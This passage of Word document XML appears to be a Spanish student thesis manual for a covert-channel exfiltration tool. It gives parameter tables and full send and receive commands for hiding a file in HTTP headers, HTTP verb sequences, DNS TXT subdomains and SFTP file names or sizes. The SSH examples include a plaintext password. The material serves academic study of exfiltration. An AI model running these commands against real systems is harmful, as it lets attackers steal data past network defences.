            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--iface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Interfaz Npcap para canales raw (TCP/1, TCP/2, ICMP). Ej: \Device\NPF_{GUID}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Espera base en ms entre paquetes/fragmentos. Por defecto 0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Variación aleatoria +/- en ms sobre ritmo-base. Por defecto 0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--fragment-size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Tamaño de fragmento en bytes (solo send). Por defecto 1024.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Parámetros exclusivos de send:</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--recurso-tipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Tipo de recurso: ARCHIVO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--recurso-ubicacion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ruta al fichero a exfiltrar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Parámetros exclusivos de receive:</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--out-file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ruta donde guardar el fichero reconstruido.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>5. Protocolos y métodos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>5.1 HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>El propio TFG levanta un servidor HTTP ligero en el receptor. No se necesita ningún servidor web externo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 1 — Headers HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada fragmento del payload se codifica en Base64 y se envía en la cabecera HTTP personalizada X-Exfil-Data de una petición POST. El receptor extrae y decodifica el payload de las cabeceras recibidas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXHTTP1 --canal HTTP --metodo 1 --host 0.0.0.0 --puerto 8080 --cifrado NINGUNO --out-file ./test/out_http1.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal HTTP --metodo 1 --host 192.168.1.34 --puerto 8080 --transfer-id RXHTTP1 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt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servidor receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto HTTP. Por defecto 8080.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre peticiones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 2 — Secuencia de verbos HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada byte del payload se codifica en 4 peticiones HTTP consecutivas usando el verbo (GET=00, POST=01, PUT=10, DELETE=11) para representar 2 bits por petición (MSB primero). El receptor reconstruye los bytes contando la secuencia de verbos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXHTTP2 --canal HTTP --metodo 2 --host 0.0.0.0 --puerto 8080 --cifrado NINGUNO --out-file ./test/out_http2.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal HTTP --metodo 2 --host 192.168.1.34 --puerto 8080 --transfer-id RXHTTP2 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt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servidor receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto HTTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre peticiones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>5.2 DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>El TFG levanta un servidor DNS en el receptor en el puerto 53. Los datos viajan codificados en Base32 como subdominios de las consultas DNS TXT. Requiere privilegios de Administrador en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 1 — Subdominios TXT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada fragmento del payload se codifica en Base32 y se envía como subdominio de una consulta DNS TXT. El receptor extrae y decodifica el payload de los subdominios recibidos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXDNS1 --canal DNS --metodo 1 --host 0.0.0.0 --puerto 53 --cifrado NINGUNO --out-file ./test/out_dns1.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal DNS --metodo 1 --host 192.168.1.34 --puerto 53 --root-domain tfg.local --transfer-id RXDNS1 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt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servidor DNS receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto DNS. Siempre 53.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--root-domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Dominio raíz de las consultas. Ej: tfg.local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre consultas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>5.3 SSH / SFTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Usa SFTP sobre SSH para depositar ficheros en el servidor. El receptor (receive) se conecta al mismo servidor SSH desde localhost y lee los ficheros depositados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="707070"/>
        </w:rPr>
        <w:t>NOTA: El comando receive se ejecuta en la propia máquina servidora conectándose a 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 2 — Nombres de fichero (Base32)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada fragmento se codifica en Base32 y se usa como nombre del fichero SFTP. Los ficheros tienen tamaño cero; el dato está en el nombre. El receptor lista los ficheros en orden de secuencia y decodifica los nombres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXSSH2 --canal SSH --metodo 2 --host 127.0.0.1 --puerto 22 --ssh-user Usuario --ssh-pass Orion_2003 --remote-dir C:/tfg_test --cifrado NINGUNO --out-file ./test/ssh/out_ssh2.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal SSH --metodo 2 --host 192.168.1.34 --puerto 22 --ssh-user Usuario --ssh-pass Orion_2003 --remote-dir C:/tfg_test --transfer-id RXSSH2 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt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servidor SSH (127.0.0.1 en receive; IP remota en send).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto SSH. Por defecto 22.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ssh-user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Usuario SSH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ssh-pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Contraseña SSH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--remote-dir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Directorio remoto donde se depositan los ficheros.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre subidas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 3 — Tamaño de fichero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada byte del payload se codifica en el tamaño de un fichero SFTP (tamaño = 4096 + byte). El receptor mide el tamaño de cada fichero y resta 4096 para recuperar el byte original.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXSSH3 --canal SSH --metodo 3 --host 127.0.0.1 --puerto 22 --ssh-user Usuario --ssh-pass Orion_2003 --remote-dir C:/tfg_test --cifrado NINGUNO --out-file ./test/ssh/out_ssh3.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal SSH --metodo 3 --host 192.168.1.34 --puerto 22 --ssh-user Usuario --ssh-pass Orion_2003 --remote-dir C:/tfg_test --transfer-id RXSSH3 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt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servidor SSH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto SSH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ssh-user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Usuario SSH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ssh-pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Contraseña SSH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--remote-dir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Directorio remoto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre subidas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
